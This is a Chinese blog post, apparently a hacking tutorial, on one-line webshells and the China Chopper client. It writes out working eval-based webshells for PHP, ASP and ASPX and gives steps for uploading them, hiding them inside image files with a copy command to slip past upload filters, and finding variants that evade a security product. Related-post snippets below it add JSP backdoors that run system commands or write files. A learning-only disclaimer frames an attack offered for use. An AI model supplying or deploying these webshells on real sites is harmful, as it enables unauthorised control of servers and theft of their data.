一句话木马与中国菜刀

最新推荐文章于 2024-08-27 10:14:10 发布
最新推荐文章于 2024-08-27 10:14:10 发布
阅读量1.1w 收藏 51
点赞数 7
分类专栏: 渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37236745/article/details/83540222
版权
什么是一句话木马?

一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下

php:<?php @eval($_post['pass']);?>
asp:<%eval request ("pass")%>
aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

这里没有放jsp的一句话木马,因为jsp的一句话比较复杂,想看的可以看这篇文章

一句话木马的使用

以php一句话为例,我们可以直接将这些语句插入到网站的某个php文件上,或者直接创建一个新的文件,在文件里写入一句话木马,然后把文件上传到网站上即可。

假设有个智障网站有这样的漏洞:

我们把这个phpma.php上传上去后,打开中国菜刀,在空白处鼠标右键,选择“添加选项”

编辑相关参数,包括一句话木马所在的URL以及密码,最后点击“编辑”

在URL中选中目标网站,点击鼠标右键,选择“文件管理”,就能看到网站的目录结构了

获取整个网站的目录了~然后就可以开始做坏事

图片一句话制作

如果网站限制了上传类型,.asp,.php上传不上出,但是可以上传图片,那么就可以使用图片隐写术将一句话木马安插在图片里,具体操作步骤是:
首先准备好一张图片,一个一句话木马,以及同路径下的dos窗口

然后输入DOS命令:copy 1.jpg+1.php 2.jpg

此时产生的2.jpg就是我们要的图片一句话木马

总结

其他类型的一句话木马也是一样的使用方法。当然,一般网站不可能这么容易就上传,肯定有防护机制,比方说安全狗防护,这时可以去网上搜过狗一句话等等。本博客仅供学习交流使用,不可用于任何违法行为中,学信息安全,保卫我国信息安全,爱我中国~

数学家是我理想
关注
专栏目录
中国菜刀php一句话,中国菜刀之写一句话木马变形
weixin_39879674的博客
04-01 900
了解一句话脚本的工作原理一句话脚本的工作原理:一句话恶意脚本分析服务端与客户端。(此处以asp脚本语言简述原理)一句话恶意脚本服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中pass可以自己修改一句话恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据...
java 菜刀_jsp一句话木马菜刀
weixin_30341121的博客
02-20 6335
1.如何使用JSP一句话木马菜刀木马相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许一场血雨...
jsp一句话 命令执行
最新发布
qq_43615820的博客
08-27 125
【代码】jsp一句话 命令执行。
一句话中国菜刀的用法
netuser1937的博客
12-19 5342
一句话中国菜刀的用法
发一个 JSP 木马
客亦知夫水与月乎?
06-03 4772
发一个大学时期在网上找到的 jsp 木马 怎么用?具体的不太清楚,但肯定要让别人部署到他们的项目中去。 而且,这个仅仅是一个草案。 更加完善的应该包括,隐藏,通知控制端,。。等等 以前写过一个 java 木马,我直接将木马模块给混在 spring 的依赖 jar 包里面了。 当然,我并没有去害过谁,我只是自己测试了一下,觉得蛮有意思的。 废话不多说,上代码:
java一句话木马_如何使用JSP一句话木马菜刀木马
weixin_39782545的博客
02-16 4359
展开全部相信用过一句话木马的黑阔们对中国32313133353236313431303231363533e4b893e5b19e31333337393033菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使...
菜刀一句话木马
weixin_44720762的博客
05-02 3873
中国菜刀,一个非常好用而又强大的webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 在博主本人看来,对于一名网安小白来说,这段解释对理解webshell没有丝毫帮助。webshell:web:网站 shell:命令语言。执行用户输入的命令或者说执行预先设定好的一连串的命令 也就是一种具有命令效果的网页代码,...
jsp小后门
Jiajia2017的博客
12-18 1072
转自  http://zone.wooyun.org/content/17356  园长 一:执行系统命令:无回显执行系统命令:<%Runtime.getRuntime().exec(request.getParameter("i"));%>请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls执行之后不会有任何回显,...
一句话木马JSP
09-21 8854
JSP一句话收集: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> ...
jsp一句话总结
weixin_45486362的博客
06-25 5447
** 基本原理 ** 由于Java中没有所谓的eval函数,无法对直接传递的代码进行解析执行。所以不管是蚁剑还是菜刀对于JSP的shell一直是采用custom模式,即把要执行的代码提前写在shell中,然后每次只需要传递要调用的函数名以及对应的参数即可。 虽然可以实现相应的功能,但是带来一个问题就是shell体积非常巨大。菜刀jsp脚本有7kb大小,蚁剑的jsp custom脚本即使去掉注释后还有17k之多,用起来非常的不方便。 冰蝎的作者rebeyond大佬在文章 利用动态二进制加密实现新型一句话木马
菜刀一句话
baidu_41942652的博客
04-28 643
百度下载菜刀软件,解压缩后,打开。 右键点击空白处,点击添加 输入shell地址,选择脚本 完成!
中国菜刀一句话木马之间的原理分析
qq_43592994的博客
05-28 3851
参考文章 https://blog.csdn.net/gscaiyucheng/article/details/24911375 http://www.ifuryst.com/archives/caidao.html https://www.yongshen.me/index.php/archives/1199.html 0x00前言 前段时间在做sql注入实验室的时候 需要用到 dump int...
一句话木马拿Shell与菜刀原理
悦分享
07-12 1561
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
ctf中国菜刀连接一句话木马
weixin_41038905的博客
05-06 6853
中国菜刀下载地址,试了好几个版本的就这个好用: https://pan.baidu.com/share/link?shareid=871753024&uk=388464620 上传一句话木马: <?php @eval($_POST['hacker'])?> 将一句话木马另存为one.jpg,通过Burp抓包改包上传为one.php 通过菜刀连接: 在空白位置右键-》添加 ...
JSP菜刀那点事
weixin_30633507的博客
12-05 714
脚本下载地址: JSP脚本:http://xsser.me/caidao/css.jsp Jspx脚本:http://xsser.me/caidao/jspx.jspx Jspf脚本:http://xsser.me/caidao/css.jspf 执行自定义查询备份: 在任意的SQL语句后面加上:--f:xxxx.sql(任意文件名和后缀) 如: SELECT * FROM...
JSP一句话后门--2006-08-03
Quantum Intelligence
09-03 5819
...之前的原创都给人家抬走了!真郁闷.这次 在这里说明~  [转载请注名 無名氏nonamed 作品]java是 面向对象编程的语言了! 啥都是对象!基于编译与解析之间~~-_- ... 估计没有eval  execute这样功能的函数了!...但是还是可以留一句话后门的 本来我想用反射实现 像 eval这样的功能.....但是失败了!郁闷!后来没有办法~~ 算了~~ 这样实现吧!
上传漏洞(一句话木马中国菜刀使用、DVWA文件上传漏洞利用)
qq_53058639的博客
03-16 1796
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Web安全-一句话木马
jennycisp的博客
12-25 4591
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?【点击免费领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》?基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。表示从页面中获得attack这个参数值。
探索一句话木马技术及其实现方式
总结,了解一句话木马的工作原理、防范措施、检测与清除方法是保护计算机系统安全的重要组成部分。同时,合理利用文件压缩和文本记录工具,可以更高效地管理和分享关于计算机安全的知识。用户应当始终保持警惕,避免...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

数学家是我理想

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值